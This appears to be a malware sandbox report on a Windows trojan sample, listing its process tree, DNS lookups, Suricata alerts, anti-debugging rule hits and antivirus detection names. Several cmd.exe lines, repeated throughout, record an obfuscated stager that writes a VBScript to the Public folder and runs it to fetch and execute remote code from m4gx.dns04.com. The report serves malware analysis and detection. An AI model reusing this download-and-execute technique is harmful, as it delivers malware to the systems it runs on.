Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 25, 2023, 11:13 a.m. | Oct. 25, 2023, 11:22 a.m. |
-
-
cmd.exe C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
316-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
2084 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
2120 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
2200 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
2236 -
-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
2356
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
m4gx.dns04.com | 206.71.149.162 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 206.71.149.162:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49172 -> 206.71.149.162:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 206.71.149.162:443 -> 192.168.56.103:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 206.71.149.162:443 -> 192.168.56.103:49174 | 2260001 | SURICATA Applayer Wrong direction first Data | Generic Protocol Command Decode |
Suricata TLS
No Suricata TLS
pdb_path | C:\U3\GtYD2\Release\GtYD2.pdb |
file | C:\Users\Public\bjk6l9.vbs |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs" |
cmdline | C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
file | C:\Windows\SysWOW64\wscript.exe |
Bkav | W32.AIDetectMalware |
Lionic | Trojan.Win32.Generic.4!c |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.69973040 |
FireEye | Generic.mg.897af5616bfd6af5 |
Skyhigh | BehavesLike.Win32.Generic.tm |
ALYac | Trojan.GenericKD.69973040 |
Cylance | unsafe |
VIPRE | Trojan.GenericKD.69973040 |
Sangfor | Trojan.Win32.Agent.Vvk5 |
CrowdStrike | win/malicious_confidence_100% (W) |
BitDefender | Trojan.GenericKD.69973040 |
K7GW | Trojan ( 005ab3fa1 ) |
K7AntiVirus | Trojan ( 005ab3fa1 ) |
BitDefenderTheta | Gen:NN.ZexaE.36792.avW@aShlPPhi |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/Agent.AFVT |
APEX | Malicious |
Kaspersky | UDS:DangerousObject.Multi.Generic |
Tencent | Win32.Trojan.Agent.Tdkl |
Sophos | Mal/Generic-S |
F-Secure | Trojan.TR/Agent.mrbbs |
DrWeb | Trojan.Siggen21.49399 |
Trapmine | suspicious.low.ml.score |
Emsisoft | Trojan.GenericKD.69973040 (B) |
SentinelOne | Static AI - Suspicious PE |
MAX | malware (ai score=89) |
GData | Trojan.GenericKD.69973040 |
Webroot | W32.Trojan.GenKD |
Detected | |
Avira | TR/Agent.mrbbs |
Varist | W32/ABRisk.GTAZ-0795 |
Antiy-AVL | Trojan/Win32.Wacatac |
Gridinsoft | Ransom.Win32.Wacatac.sa |
Xcitium | Malware@#25r4jjivpccpl |
Arcabit | Trojan.Generic.D42BB430 |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
Microsoft | Trojan:Win32/Casdet!rfn |
Cynet | Malicious (score: 99) |
AhnLab-V3 | Trojan/Win.Generic.R617107 |
McAfee | Artemis!897AF5616BFD |
DeepInstinct | MALICIOUS |
Malwarebytes | Malware.AI.2449542126 |
Panda | Trj/Chgt.AD |
TrendMicro-HouseCall | TROJ_GEN.R014H0DJO23 |
Rising | Trojan.Generic@AI.100 (RDML:w7xvx4wo2d+WLq4BjTme0g) |
Ikarus | Trojan.Win32.Agent |
MaxSecure | Trojan.Malware.300983.susgen |
AVG | Win32:MalwareX-gen [Trj] |
Avast | Win32:MalwareX-gen [Trj] |